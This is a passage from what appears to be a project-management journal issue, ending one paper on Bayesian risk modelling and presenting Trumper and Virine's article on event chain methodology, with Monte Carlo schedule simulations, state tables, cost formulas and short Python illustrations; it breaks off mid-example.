and probabilities need to be assigned that reflect our best
knowledge.
„ It requires an analytical mindset to decompose the
problem into "classes" of event and relationships that are
granular enough to be meaningful, but not too detailed that
they are overwhelming.
If we were omniscient we would have no need of probabilities; the fact that we are not gives rise to our need to
model uncertainty at a level of detail that we can grasp, that
is useful and which is accurate enough for the purpose required. This is why causal modelling is as much an art (but
an art based on insight and analysis) as a science.
The time spent analysing risks must be balanced against the short-term need to take action and the magnitude of the risks involved. Therefore, we must make judgements about
how deeply we model some risks and how quickly we use
this analysis to inform our actions.
References
[1] S.L. Lauritzen, D.J. Spiegelhalter. "Local computations with probabilities on graphical structures and their application to expert systems (with discussion)." Journal of the Royal Statistical Society, Series B, 50(2): 157-224, 1988.
[2] I.B. Hossack, J.H. Pollard, B. Zehnwirth. Introductory Statistics with Applications in General Insurance. Cambridge University Press, 1999.
[3] W. Casscells, A. Schoenberger, T.B. Graboys. "Interpretation by physicians of clinical laboratory results." New England Journal of Medicine 299: 999-1001, 1978.
[4] L. Cosmides, J. Tooby. "Are humans good intuitive statisticians after all? Rethinking some conclusions from the literature on judgment under uncertainty." Cognition 58: 1-73, 1996.
[5] N. Fenton, M. Neil. "Comparing risks of alternative medical diagnosis using Bayesian arguments." Journal of Biomedical Informatics 43: 485-495, 2010.
[6] J. Pearl. "Fusion, propagation, and structuring in belief networks." Artificial Intelligence 29(3): 241-288, 1986.
[7] Agena 2010, <http://www.agenarisk.com>.
[8] N.E. Fenton, M. Neil. Managing Risk in the Modern World: Bayesian Networks and the Applications. London Mathematical Society, Knowledge Transfer Report 1, 2007. <http://www.lms.ac.uk/activities/comp_sci_com/KTR/apps_bayesian_networks.pdf>.
Event Chain Methodology in Project Management
Michael Trumper and Lev Virine
Risk management has become a critical component of project management processes. Quantitative schedule risk analysis methods enable project managers to assess how risks and uncertainties will affect project schedules and increase the
effectiveness of their project planning. Event chain methodology is an uncertainty modeling and schedule network analysis technique that focuses on identifying and managing the events and event chains that affect projects. Event chain
methodology improves the accuracy of project planning by simplifying the modeling and analysis of risks and uncertainties in the project schedules. As a result, it helps to mitigate the negative impact of cognitive and motivational biases
related to project planning. Event chain methodology is currently used in many organizations as part of their project risk
management process.
Keywords: Project Management, Project Scheduling,
Quantitative Methods, Schedule Network Analysis.
1 Why Project Managers ignore Risks in Project
Schedules
Virtually all projects are affected by multiple risks and
uncertainties. These uncertainties are difficult to identify and
analyze, which can lead to inaccurate project schedules. Due
to these inherent uncertainties, most projects do not proceed exactly as planned and, in many cases, they lead to
project delays, cost overruns, and even project failures.
Therefore, creating accurate project schedules, which reflect potential risks and uncertainties, remains one of the
main challenges in project management.
In [1][2][3] the authors reviewed technical, psychological and political explanations for inaccurate scheduling and
forecasting. They found that strategic misrepresentation by project planners under political and organizational pressure, as well as cognitive biases, play major roles in inaccurate forecasting. In other words, project planners
either unintentionally, due to psychological biases, or intentionally, due to organizational pressures, consistently
deliver inaccurate estimates for cost and schedule, which in
turn lead to inaccurate forecasts [4].
Among the cognitive biases related to project forecasting are the planning fallacy [5] and the optimism bias [6].
According to one explanation, project managers do not account for risks or other factors that they perceive as lying
outside of the specific scope of a project. Project managers
may also discount multiple improbable high-impact risks
because each has very small probability of occurring. It has
been proposed in [7] that limitations in human mental processes cause people to employ various simplifying strategies
to ease the burden of mentally processing information when
making judgments and decisions. During the planning stage,
project managers rely on heuristics or rules of thumb to make
their estimates. Under many circumstances, heuristics lead
to predictably faulty judgments or cognitive biases [8]. The
availability heuristic [9][10] is a rule of thumb with which
decision makers assess the probability of an event by the
Authors
Michael Trumper has over 20 years experience encompassing
technical communications, instructional and software design for
project risk and economics software. He has consulted in the
development and delivery of project risk analysis and
management software, consulting, and training solutions to
clientele that includes NASA, Boeing, Dynatec, Lockheed
Martin, Proctor and Gamble, L-3com and others. Coauthored
"Project Decisions: the art and science" (published in 2007 and
currently in PMI bookstore) and authored papers on quantitative
methods in project risk analysis. <[email protected]>.
Lev Virine has more than 20 years of experience as a structural
engineer, software developer, and project manager. In the past
10 years he has been involved in a number of major projects
performed by Fortune 500 companies and government agencies to establish effective decision analysis and risk management
processes as well as to conduct risk analyses of complex projects.
Lev’s current research interests include the application of
decision analysis and risk management to project management.
He writes and speaks to conferences around the world
on project decision analysis, including the psychology of
judgment and decision-making, modeling of business processes,
and risk management. Lev received his doctoral degree in
engineering and computer science from Moscow State
University, Russia. <[email protected]>.
ease with which instances or occurrences can be brought to
mind. For example, project managers sometimes estimate
task duration based on similar tasks that have been previously completed. If they base their judgments on their most
or least successful tasks, this can cause inaccurate estimations. The anchoring heuristic refers to the human tendency
to remain close to an initial estimate. Anchoring is related
to overconfidence in estimation of probabilities – a tendency to provide overly optimistic estimates of uncertain
events. Arbitrary anchors can also affect people’s estimates
of how well they will perform certain problem solving tasks
[11].
Problems with estimation are also related to selective
perception - the tendency for expectations to affect perception [12]. Sometimes selective perception is referred, as "I
only see what I want to see". One of the biases related to
selective perception is the confirmation bias. This is the tendency of decision makers to actively seek out and assign
more weight to evidence that confirms their hypothesis, and
to ignore or underweight evidence that could discount their
hypothesis [13][14].
Another problem related to improving the accuracy of
project schedules is the complex relationship between different uncertainties. Events can occur in the middle of an
activity, they can be correlated with each other, one event
can cause other events, the same event may have different
impacts depending upon circumstances, and different mitigation plans can be executed under different conditions.
These complex systems of uncertainties must be identified
and visualized to improve the accuracy of project schedules.
Finally, the accuracy of project scheduling can be improved by constantly refining the original plan using actual
project performance measurement [15]. This can be achieved
through analysis of uncertainties during different phases of
the project and incorporating new knowledge into the project
schedule. In addition, a number of scheduling techniques, such as resource leveling, the incorporation of mitigation plans, and the presence of repeated activities, are difficult to model in project schedules with risks and uncertainties. Therefore, the objective is to identify a simpler process, which includes project performance measurement and other
analytical techniques.
Event chain methodology has been proposed as an attempt to satisfy the following objectives related to project
scheduling and forecasting by:
1. Mitigating the negative effects of motivational and cognitive biases and improving the accuracy of estimating and forecasting.
2. Simplifying the process of modeling risks and uncertainties in project schedules, in particular, by improving
the ability to visualize multiple events that affect project
schedules and perform reality checks.
3. Performing more accurate quantitative analysis while
accounting for such factors as the relationships between
different events and the actual moment of events.
4. Providing a flexible framework for scheduling which includes project performance measurement, resource leveling, execution of mitigation plans, correlations between risks, repeated activities, and other types of analysis.
2 Existing Techniques as Foundations for Event
Chain Methodology
The accuracy of project scheduling with risks and un-
certainties can be improved by applying a process or
workflow tailored to the particular project or set of projects
(portfolio) rather than using one particular analytical technique. According to the PMBOK® Guide of the Project
Management Institute [16] such processes can include methods of identification of uncertainties, qualitative and quantitative analysis, risk response planning, and risk monitoring and control. The actual processes may involve various
tools and visualization techniques.
One of the fundamental issues associated with managing project schedules lies in the identification of uncertainties. If the estimates for input uncertainties are inaccurate,
this will lead to inaccurate results regardless of the analysis
methodology. The accuracy of project planning can be significantly improved by applying advanced techniques for the identification of risks and uncertainties. Extensive sets of techniques and tools which can be used by individuals as well
as in groups are available to simplify the process of uncertainty modeling [17][18].
The PMBOK® Guide recommends creating risk templates based on historical data. There are no universal, exhaustive risk templates for all industries and all types of
projects. Project management literature includes many examples of different risk lists which can be used as templates
[19]. A more advanced type of template is proposed in [20]:
risk questionnaires. They provide three choices for each risk
where the project manager can select when the risk can
manifest itself during the project: a) at any time, b) about half the time, and c) less than half the time. One of the most
comprehensive analyses of risk sources and categories was
performed by Scheinin and Hefner [21]. Each risk in their
risk breakdown structure includes what they call a "frequency" or rank property.
PMBOK® Guide recommends a number of quantitative analysis techniques, such as Monte Carlo analysis, decision trees and sensitivity analysis. Monte Carlo analysis
is used to approximate the distribution of potential results
based on probabilistic inputs [22][23][24][25]. Each trial is
generated by randomly pulling a sample value for each input variable from its defined probability distribution. These
input sample values are then used to calculate the results.
This procedure is then repeated until the probability distri-
butions are sufficiently well represented to achieve the desired level of accuracy. The main advantage of Monte Carlo
simulation is that it helps to incorporate risks and uncertainties into the process of project scheduling.
However Monte Carlo analysis has the following limitations:
1. Project managers perform certain recovery actions
when a project slips. These actions in most cases are not
taken into account by Monte Carlo. In this respect, Monte
Carlo may give overly pessimistic results [26].
2. Defining distributions is not a trivial process. Distributions are a very abstract concept that some project managers find difficult to work with [27].
Monte Carlo simulations may be performed based on
uncertainties defined as risk drivers, or events [28][29]. Such
risk drivers may lead to increases in task duration or cost.
Each event is defined by different probability and impact,
and can be assigned to a specific task. For example, the event "problem with delivery of the component" may lead to a 20% delay of the task with a probability of 20%. The issue with such an approach is that relations between risks must be defined and taken into account during the simulation process. For example,
in many cases one risk will trigger another risk but only
based on certain conditions. These relationships can be very
difficult to define using traditional methods.
Another approach to project scheduling with uncertainties was developed by Goldratt [30], who applied the theory
of constraints to project management. The cornerstone of
the theory is resource constrained critical paths called a "critical chain". Goldratt’s approach is based on a deterministic
critical path method. To deal with uncertainties, Goldratt
suggests using project buffers and encouraging early task
completion. Although critical chain has proved to be a very
effective methodology for a wide range of projects [31][32],
it is not fully embraced by many project managers because
it requires change to established processes.
A number of quantitative risk analysis techniques have
been developed to deal with specific issues related to uncertainty management. Decision trees [33] help to calculate the expected value of projects as well as to identify project alternatives and to select better courses of action. Sensitivity analysis is used to determine which variables, such as risks, have the most potential impact on projects [25]. These
types of analysis usually become important components in
a project planning process that accounts for risks and uncertainties.
One of the approaches, which may help to improve accuracy of project forecasts, is the visualization of project
plans with uncertainties. Traditional visualization techniques
include bar charts or Gantt charts and various schedule network diagrams [16]. Visual modeling tools are widely used
to describe complex models in many industries. Unified
modeling language (UML) is actively used in software design [34][35].
Among integrated processes designed to improve the
accuracy of project planning with risks and uncertainties is
the reference class forecasting technique [36]. This process includes identifying similar past and present projects,
establishing probability distributions for selected reference
classes and using them to establish the most likely outcome
of a specific project. The American Planning Association
officially endorses reference class forecasting. Analysis based on historical data helps to make more accurate forecasts; however, such analyses have the following major shortcomings:
1. Creating sets of references or analogue sets is not a
trivial process because it involves a relevance analysis of
previous projects and previous projects may not be relevant
to the current one.
2. Many projects, especially in the area of research and
development, do not have any relevant historical data.
3 Overview of Event Chain Methodology
Event chain methodology is a practical schedule network analysis technique as well as a method of modeling
and visualizing uncertainties. Event chain methodology comes from the notion that regardless of how well project schedules are developed, some events may occur that will alter them. Identifying and managing these events or event
chains (when one event causes another event) is the focus
of event chain methodology. The methodology focuses on events rather than on continuous changes in the project environment, because continuous problems within a project can usually be detected and fixed before they have a significant effect upon the project.
Project scheduling and analysis using events chain methodology includes the following steps:
1. Create a project schedule model using best-case scenario estimates of duration, cost, and other parameters. In
other words, project managers should use estimates that
they are comfortable with, which in many cases will be
optimistic. Because of a number of cognitive and motivational factors outlined earlier project managers tend to create optimistic estimates.
2. Define a list of events and event chains with their
probabilities and impacts on activities, resources, lags, and
calendars. This list of events can be represented in the form
of a risk breakdown structure. These events should be identified separately (separate time, separate meeting, different
experts, different planning department) from the schedule
model to avoid situations where expectations about the
project (cost, duration, etc.) affect the event identification.
3. Perform a quantitative analysis using Monte Carlo
simulations. The results of Monte Carlo analysis are statis-
tical distributions of the main project parameters (cost, duration, and finish time), as well as similar parameters associated with particular activities. Based on such statistical
distributions, it is possible to determine the chance the
project or activity will be completed on a certain date and
within a certain cost. The results of Monte Carlo analysis
can be expressed on a project schedule as percentiles of
start and finish times for activities.
4. Perform a sensitivity analysis as part of the quantitative analysis. Sensitivity analysis helps identify the crucial activities and critical events and event chains. Crucial
activities and critical events and event chains have the greatest effect on the main project parameters. Reality checks may be used to validate whether the probabilities of the events are defined properly.
5. Repeat the analysis on a regular basis during the
course of a project based on actual project data and include
the actual occurrence of certain risks. The probability and
impact of risks can be reassessed based on actual project
performance measurement. This helps to provide up-to-date
forecasts of project duration, cost, or other parameters.
4 Foundations of Event Chain Methodology
Event chain methodology expands on the Monte Carlo simulation of project schedules and particularly the risk driver (events) approach. Event chain methodology focuses on the relationship between risks, the conditions for risk occurrence, and the visualization of risk events.
Some of the terminology used in event chain methodology comes from the field of quantum mechanics. In particular, quantum mechanics introduces the notions of excitation and entanglement, as well as grounded and excited
states [37][38]. The notion of event subscription and
multicasting is used in object oriented software development as one of the types of interactions between objects
[39][40].
5 Basic Principles of Event Chain Methodology
Event chain methodology is based on six major principles. The first principle deals with single events, the second
principle focuses on multiple related events or event chains,
the third principle defines rules for visualization of the events
or event chains, the fourth and fifth principles deal with the analysis of the schedule with event chains, and the sixth principle defines project performance measurement techniques with events or event chains. Event chain methodology is not a completely new technique, as it is based on existing quantitative methods such as Monte Carlo simulation and Bayes theorem.
Principle 1: Moment of Event and Excitation States
An activity in most real life processes is not a continuous and uniform procedure. Activities are affected by external events that transform them from one state to another.
The notion of state means that the activity will be performed
differently as a response to the event. This process of changing the state of an activity is called excitation. In quantum
mechanics, the notion of excitation is used to describe elevation in energy level above an arbitrary baseline energy
state. In Event chain methodology, excitation indicates that
something has changed the manner in which an activity is
performed. For example, an activity may require different
resources, take a longer time, or must be performed under
different conditions. As a result, this may alter the activity’s
cost and duration.
The original or planned state of the activity is called a
ground state. Other states, associated with different events
are called excited states (Figure 1). For example, in the middle of an activity the project requirements change. As a result, a planned activity must be restarted. Similarly to quantum mechanics, if significant event affects the activities, it
will dramatically affect the property of the activity, for example cancel the activity.
Events can affect one or many activities, material or work
resources, lags, and calendars. Such event assignment is an
important property of the event. An example of an event
that can be assigned to a resource is an illness of a project
team member. This event may delay all activities to which this resource is assigned. Similarly, resources, lags, and calendars may have different ground and excited states. For example, the event "Bad weather condition" can transform a calendar from a ground state (5 working days per week) to an excited state: non-working days for the next 10 days.
Each state of an activity may subscribe to certain events. This means that an event can affect the activity only if the activity is subscribed to this event. For example, an assembly activity has started outdoors. In its ground state the activity is subscribed to the external event "Bad weather".
If "Bad weather" actually occurs, the assembly should move
indoors. This constitutes an excited state of the activity. This
new excited state (indoor assembling) will not be subscribed
to the "Bad weather": if this event occurs it will not affect
the activity.
Event subscription has a number of properties. Among
them are:
„ Impact of the event is a property of the state rather than of the event itself. This means that the impact can be different if an activity is in a different state. For example, an activity is subscribed to the external event "Change of requirements". In the ground state of the activity, this event can cause a 50% delay of the activity. However, if the event has occurred, the activity is transformed to an excited state. In the excited state, if "Change of requirements" occurs again, it will cause only a 25% delay of the activity, because management has performed certain actions when the event first occurred.
„ Probability of occurrence is also a property of subscription. For example, there is a 50% chance that the event
will occur. Similarly to impact, probability of occurrence
can be different for different states;
„ Excited state: the state the activities are transformed
to after an event occurs;
„ Moment of event: the actual moment when the event
occurs during the course of an activity. The moment of event
can be absolute (certain date and time) or relative to an
activity’s start and finish times. In most cases, the moment
when the event occurs is probabilistic and can be defined
using a statistical distribution (Figure 1). Very often, the
overall impact of the event depends on when an event occurs. For example, the moment of the event can affect the total duration of an activity if it is restarted or cancelled. Below is an example of how one event (restart activity) with a probability of 50% can affect one activity (Table 1). Monte Carlo simulation was used to perform the analysis. The original activity duration is 5 days.

Table 1: Moment of Risk Significantly affects Activity Duration.

Moment of risk                                                Mean activity duration with the event occurred   90th percentile
Risk most likely occurs at the end of the activity
(triangular distribution for moment of risk)                  5.9 days                                         7.9 days
Equal probability of the risk occurrence during
the course of the activity                                    6.3 days                                         9.14 days
Risk occurs only at the end of the activity                   7.5 days                                         10 days
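The kind of simulation behind Table 1 can be sketched in a few lines. The sketch below assumes a 5-day activity, a 50% "restart activity" event and a uniformly distributed moment of risk; it roughly reproduces the "equal probability" row of Table 1, and the other rows would follow from a different moment-of-risk distribution.

import random

def simulate_restart(duration=5.0, p_event=0.5, trials=100_000):
    """Monte Carlo for one activity with a 'restart activity' event.
    The moment of risk is uniform over the activity; a restart means the
    work done so far is lost and the full duration is repeated."""
    results = []
    for _ in range(trials):
        if random.random() < p_event:
            moment = random.uniform(0.0, duration)   # when the event occurs
            results.append(moment + duration)        # restart from scratch
        else:
            results.append(duration)
    results.sort()
    mean = sum(results) / trials
    p90 = results[int(0.9 * trials)]
    return mean, p90

mean, p90 = simulate_restart()
print(f"mean duration ~ {mean:.1f} days, 90th percentile ~ {p90:.1f} days")
# roughly 6.3 and 9 days, close to the 'equal probability' row of Table 1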
Events can have negative (risks) and positive (opportunities) impacts on projects. Mitigation efforts are considered to be events, which are executed if an activity is in an
excited state. Mitigation events may attempt to transform
the activity to the ground state.
Impacts of an event affecting activities, a group of activities, or lags can be:
„ Delay activity, split activity, or start activity later;
delays can be defined as fixed (fixed period of time) and
relative (in percent of activity duration); delay also can be
negative
„ Restart activity
„ Stop activity and restart it later if required
„ End activity
„ Cancel activity, or cancel activity with all successors, which is similar to end activity except that the activity will be marked as cancelled for future calculation of the activity's success rate
„ Fixed or relative increase or reduction of the cost
„ Redeploy resources associated with activity; for example a resource can be moved to another activity
„ Execute events affecting another activity or group of activities, change a resource, or update a calendar. For example, this event can start another activity such as a mitigation plan, change the excited state of another activity, or update event subscriptions for the excited state of another activity
Figure 2: Example of Event Chain.
The impacts of events are characterised by some additional parameters. For example, a parameter associated with
the impact "Fixed delay of activity" is the actual duration
of the delay.
The impact of events associated with resources is similar to the impact of activity events. Resource events will
affect all activities this resource is assigned to. If a resource
is only partially involved in the activity, the probability of the event will be proportionally reduced. The impact of events
associated with a calendar changes working and non-working times.
One event can have multiple impacts at the same time.
For example, a "Bad weather" event can cause an increase
of cost and duration at the same time. Events can be local, affecting a particular activity, group of activities, lags, resources, and calendars, or global, affecting all activities in the project.
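As a rough illustration of how these concepts fit together, the sketch below represents events, states and subscriptions as plain data structures. The class names, field names and numbers are illustrative assumptions of ours and are not part of any event chain methodology tool.

from dataclasses import dataclass, field

@dataclass
class Event:
    name: str
    probability: float        # probability of occurrence (a property of the subscription)
    impact: str               # e.g. "restart activity", "fixed delay"
    delay_days: float = 0.0   # extra parameter for delay-type impacts
    excited_state: str = ""   # state the activity is transformed to if the event occurs

@dataclass
class ActivityState:
    name: str                                                  # "ground" or an excited state
    subscriptions: list[Event] = field(default_factory=list)   # events this state reacts to

@dataclass
class Activity:
    name: str
    duration_days: float
    states: dict[str, ActivityState]
    current_state: str = "ground"

# Example: outdoor assembly whose ground state is subscribed to "Bad weather",
# while the excited (indoor) state is not. The probability and delay are made up.
bad_weather = Event("Bad weather", probability=0.3, impact="move indoors",
                    delay_days=1.0, excited_state="indoor assembly")
assembly = Activity(
    name="Assembly",
    duration_days=5.0,
    states={
        "ground": ActivityState("ground", subscriptions=[bad_weather]),
        "indoor assembly": ActivityState("indoor assembly"),  # no longer subscribed
    },
)
print(assembly.states[assembly.current_state].subscriptions)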
Principle 2: Event Chains
Some events can cause other events. These series of
events form event chains, which may significantly affect
the course of the project by creating a ripple effect through
the project (Figure 2). Here is an example of an event chain
ripple effect:
1. Requirement changes cause a delay of an activity.
2. To accelerate the activity, the project manager diverts resources from another activity.
3. Diversion of resources causes deadlines to be missed on the other activity.
4. Cumulatively, this reaction leads to the failure of the
whole project.
Event chains are defined using event impacts called "Execute event affecting another activity, group of activities,
change resources or update calendar". Here is how the aforementioned example can be defined using Event chain methodology:
1. The event "Requirement change" will transform the
activity to an excited state which is subscribed to the event
"Redeploy resources".
2. Execute the event "Redeploy resources" to transfer
resources from another activity. Other activities should be in a state subscribed to the "Redeploy resources" event; otherwise, resources will not be available.
3. As soon as the resources are redeployed, the activity
with reduced resources will move to an excited state and
the duration of the activity in this state will increase.
4. Successors of the activity with the increased duration will start later, which can cause a missed project deadline.
An event that causes another event is
called the sender. The sender can cause multiple events in different activities. This effect
is called multicasting. For example, a broken
component may cause multiple events: a delay in assembly, additional repair activity, and
some new design activities. Events that are
caused by the sender are called receivers.
Receiver events can also act as a sender for
another event.
The actual effect of an event chain on a
project schedule can be determined as a result of quantitative analysis. The example
below illustrates the difference between event
chain and independent events (Figure 2 and
Table 2). Monte Carlo simulations were used
to perform the analysis. The project includes
three activities of 5 days each. Each activity
is affected by the event "restart activity" with a probability
of 50%.
Below are four different strategies for dealing with risks
[41] defined using event chain methodology’s event chain
principle:
Figure 3: Event Chain: Risk Transfer.
Figure 5: Example of Event Chain Diagram.
1. Risk acceptance: excited state of the activity is considered to be acceptable.
2. Risk transfer: represents an event chain; the impact
of the original event is an execution of the event in another
activity (Figure 3).
3. Risk mitigation: represents an event chain; the original event transforms an activity from a ground state to an
excited state, which is subscribed to a mitigation event; the
mitigation event that occurs in excited state will try to transform activities to a ground state or a lower excited state
(Figure 4).
4. Risk avoidance: original project plan is built in such
a way that none of the states of the activities are subscribed
to this event.
Principle 3: Event Chain Diagrams
and State Tables
Complex relationships between events
can be visualized using event chain diagrams
(Figure 5). Event chain diagrams are presented on the Gantt chart according to a specification: a set of rules that can be understood by anybody using the diagram.
1. All events are shown as arrows. Names and/or IDs of events are shown next to the arrow.
Figure 4: Event Chain: Risk Mitigation.
Table 3: Example of the State Table for a Software Development Activity.
Ground state:
  Event 1 (Architectural changes) — probability: 20%; moment of event: any time; excited state: refactoring; impact: delay 2 weeks.
  Event 2 (Development tools issue) — probability: 10%; moment of event: any time; excited state: refactoring; impact: delay 1 week.
Excited state "refactoring":
  Event 3 (Minor requirements change) — probability: 10%; moment of event: beginning of the state; excited state: minor code change; impact: delay 2 days.
Excited state "minor code change":
  (not subscribed to any event)
2. Events with negative impacts (threats) are represented by down arrows; events with positive impacts (opportunities) are represented by up arrows.
3. Individual events are connected by lines representing the event chain.
4. A sender event with multiple connecting lines to receivers represents multicasting.
5. Events affecting all activities (global events) are
shown outside the Gantt chart. Threats are shown at the top
of the diagram. Opportunities are shown at the bottom of
the diagram.
Often event chain diagrams can become very complex.
In these cases, some details of the diagram do not need to
be shown. Here is a list of optional rules for event chain
diagrams:
1. Horizontal positions of the event arrows on the Gantt
bar correspond with the mean moment of the event.
2. Probability of an event can be shown next to the event
arrow.
3. Size of the arrow represents relative probability of
an event. If the arrow is small, the probability of the event
is correspondingly small.
4. Excited states are represented by elevating the associated section of the bar on the Gantt chart (see Figure 1).
The height of the state’s rectangle represents the relative
impact of the event.
5. Statistical distributions for the moment of event can
be shown together with the event arrow (see Figure 1).
6. Multiple diagrams may be required to represent different event chains for the same schedule.
7. Different colors can be used to represent different events (arrows) and connecting lines associated with different chains.
The central purpose of event chain diagrams is not to
show all possible individual events. Rather, event chain diagrams can be used to understand the relationship between
events. Therefore, it is recommended that event chain diagrams be used only for the most significant events during
the event identification and analysis stage. Event chain diagrams can be used as part of the risk identification process,
particularly during brainstorming meetings. Members of
project teams can draw arrows between associated activities on the Gantt chart. Event chain diagrams can be used
together with other diagramming tools.
Another tool that can be used to simplify the definition of events is a state table. Columns in the state table represent events; rows represent states of an activity. Information for each event in each state includes four properties of the event subscription: probability, moment of event, excited state, and impact of the event. The state table helps to depict an activity's subscriptions to events: if a cell is empty, the state is not subscribed to the event.
An example of a state table for a software development activity is shown in Table 3. The ground state of the activity is subscribed to two events: "architectural changes" and "development tools issue". If either of these events occurs, it transforms the activity to a new excited state called "refactoring". "Refactoring" is subscribed to another event: "minor requirements change". The refactoring state is not subscribed to the two previous events, which therefore cannot reoccur while the activity is in this state.
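A state table maps naturally onto a nested lookup structure. The sketch below is only an illustration with hypothetical names; the figures are those of Table 3, and an absent entry means the state is not subscribed to the event.

# State table for the software development activity of Table 3:
# rows are states, columns are events.
state_table = {
    "ground": {
        "architectural changes":   {"probability": 0.20, "moment": "any time",
                                    "excited_state": "refactoring", "impact": "delay 2 weeks"},
        "development tools issue": {"probability": 0.10, "moment": "any time",
                                    "excited_state": "refactoring", "impact": "delay 1 week"},
    },
    "refactoring": {
        "minor requirements change": {"probability": 0.10, "moment": "beginning of the state",
                                      "excited_state": "minor code change", "impact": "delay 2 days"},
    },
    "minor code change": {},   # not subscribed to any event
}

def subscription(state: str, event: str):
    """Return the subscription (or None) of a state to an event."""
    return state_table.get(state, {}).get(event)

# The refactoring state is not subscribed to "architectural changes",
# so that event cannot reoccur while the activity is in this state.
assert subscription("refactoring", "architectural changes") is None
assert subscription("ground", "architectural changes")["probability"] == 0.20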
Principle 4: Monte Carlo Schedule Risk Analysis
Once events, event chains, and event subscriptions are
defined, Monte Carlo analysis of the project schedule can
be performed to quantify the cumulative impact of the
events. Probabilities and impacts of events are used as input data for the analysis.
In most real life projects, even if all the possible risks
are defined, there are always some uncertainties or fluctuations or noise in duration and cost. To take these fluctuations into account, distributions related to activity duration,
start time, cost, and other parameters should be defined in
addition to the list of events. These statistical distributions
must not have the same root cause as the defined events, as
this would cause double-counting of the project's risk.
The Monte Carlo simulation process for Event chain methodology has a number of specific features. Before the sampling process starts, all event chains should be identified. In particular, all sender and receiver events should be identified through an analysis of the state tables for each activity.
Also, if events are assigned to resources, they need to be
reassigned to activities based on resource usage for each
particular activity. For example, if a manager is equally involved in two activities, a risk "Manager is not familiar with
technology" with a probability 6% will be transferred to both
activities with probability of 3% for each activity. Events
assigned to summary activities will be assigned to each activity in the group. Events assigned to lags are treated the
same way as activities.
Each trial of the Monte Carlo simulation includes the following steps specific to Event chain methodology (a simplified illustrative sketch of a single trial follows the list):
1. Moments of events are calculated based on the statistical distribution for the moment of event in each state.
2. Determine whether sender events have actually occurred in this particular trial, based on the probability of the sender.
3. Update the probabilities of receiver events based on the sender events. For example, if a sender event unconditionally causes a receiver event, the probability of the receiver event will equal 100%.
4. Determine whether receiver events have actually occurred; if a receiver event is at the same time a sender event, the process of determining probabilities of receiver events continues.
5. The process is repeated for all ground and excited states for all activities and lags.
6. If an event that causes the cancellation of an activity occurs, the activity is marked as canceled and its duration and cost are adjusted.
7. If an event that causes the start of another activity occurs, such as the execution of a mitigation plan, the project schedule is updated for the particular trial. The number of trials in which the particular activity is started is counted.
8. The cumulative impact of all events on the activity's duration and cost is augmented by accounting for fluctuations of duration and cost.
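The sketch below is a heavily simplified, purely illustrative rendering of steps 2-4 and 8 of such a trial (the event names, probabilities and delays are invented): sender events are sampled, the receivers they trigger are propagated through the chain, and the resulting delays are accumulated.

import random

# Hypothetical, simplified event model: each event has a probability, a delay
# impact (days), and optional receiver events it triggers unconditionally.
events = {
    "requirement change": {"p": 0.30, "delay": 3.0, "triggers": ["redeploy resources"]},
    "redeploy resources": {"p": 0.00, "delay": 2.0, "triggers": []},   # receiver only
    "bad weather":        {"p": 0.10, "delay": 1.0, "triggers": []},
}

def run_trial(base_duration=20.0, rng=random.Random()):
    occurred = set()
    # Step 2: determine which sender events occur in this trial.
    for name in events:
        if rng.random() < events[name]["p"]:
            occurred.add(name)
    # Steps 3-4: propagate through the chain; a triggered receiver occurs
    # with probability 100% and may itself act as a sender.
    frontier = list(occurred)
    while frontier:
        for receiver in events[frontier.pop()]["triggers"]:
            if receiver not in occurred:
                occurred.add(receiver)
                frontier.append(receiver)
    # Step 8 (simplified): cumulative impact of the occurred events on duration.
    return base_duration + sum(events[e]["delay"] for e in occurred)

durations = [run_trial() for _ in range(10_000)]
print("mean project duration:", round(sum(durations) / len(durations), 2))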
The results of the analysis are similar to the results of
classic Monte Carlo simulations of project schedules. These
results include statistical distributions for duration, cost, and
success rate of the complete project and each activity or
group of activities. Success rates are calculated based on
the number of simulations in which the event "Cancel activity" or "Cancel group of activities" occurred. Probabilistic and conditional branching, calculating the chance that the project will be completed before the deadline, probabilistic cash flow, and other types of analysis are performed in the same manner as in a classic Monte Carlo analysis of project schedules. The probability of activity existence is calculated based on two types of inputs: probabilistic and conditional branching, and the number of trials in which an activity is executed as a result of a "Start activity" event.
Principle 5: Critical Event Chains and Event Cost
Single events or event chains that have the most potential to affect the project are the critical events or critical event chains. By identifying critical events or critical event chains, it is possible to mitigate their negative effects. These critical event chains can be identified through sensitivity analysis: by analyzing the correlations between the main project parameters, such as project duration or cost, and event chains.
Critical event chains based on cost and duration may differ. Because the same event may affect different activities and have a different impact on each of them, the goal is to measure the cumulative impact of the event on the project schedule. Critical event chains based on duration are calculated using the following approach. For each event and event chain, in each trial, the cumulative impact of the event on project duration (Dcum) is calculated based on the formula:
$D_{cum} = \sum_{i=1}^{n} (D_i' - D_i) \cdot k_i$
where n is the number of activities in which this event or event chain occurs, Di is the original duration of activity i, Di' is the duration of activity i with this particular event taken into account, and ki is the Spearman rank order correlation coefficient between total project duration and the duration of activity i. If events are assigned to calendars, Di' is the duration of the activity with the calendar used as a result of the event.
The cumulative impact of an event on cost (Ccum) is calculated based on the formula:
$C_{cum} = \sum_{i=1}^{n} (C_i' - C_i)$
where Ci is the original cost of activity i and Ci' is the cost of activity i taking this particular event into account. The Spearman rank order correlation coefficient is calculated based on the cumulative effect of the event on cost and duration (Ccum and Dcum) and the total project cost and duration.
One useful measure of the impact of an event is the event cost, or the additional expected cost that would be added to the project as a result of the event. Event cost is not a mitigation cost; it can be used as a decision criterion for the selection of risk mitigation strategies. The mean event cost Cevent is the normalized cumulative effect of the event on cost and is calculated according to the following formula:
$C_{event} = (C_{project}' - C_{project}) \cdot k_{event} / \sum_{i=1}^{n} k_i$
where Cproject' is the mean total project cost with risks and uncertainties, Cproject is the mean total project cost without taking events into account but accounting for the fluctuations defined by statistical distributions, kevent is the correlation coefficient between total project cost and the cumulative impact of the event on cost, and ki is the correlation coefficient between total cost and the cumulative impact of the event on activity i. Event cost can also be calculated based on any percentile associated with the statistical distribution of project cost.
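To make the formulas concrete, the following sketch computes Dcum for a single event from per-trial simulation results, using SciPy's Spearman rank order correlation for the ki coefficients. The input data is invented purely for illustration; Ccum and Cevent can be computed in exactly the same way from the corresponding cost arrays.

import numpy as np
from scipy.stats import spearmanr

rng = np.random.default_rng(1)
n_trials, n_acts = 5000, 3

# Invented per-trial simulation results, purely for illustration:
# D[t, i]     -- original duration of activity i in trial t (no event),
# D_evt[t, i] -- duration of activity i with this particular event taken into account.
D = rng.normal(5.0, 0.5, size=(n_trials, n_acts))
event_occurred = rng.random((n_trials, n_acts)) < 0.5
D_evt = D + event_occurred * rng.uniform(0.0, 5.0, size=(n_trials, n_acts))
total_duration = D_evt.sum(axis=1)

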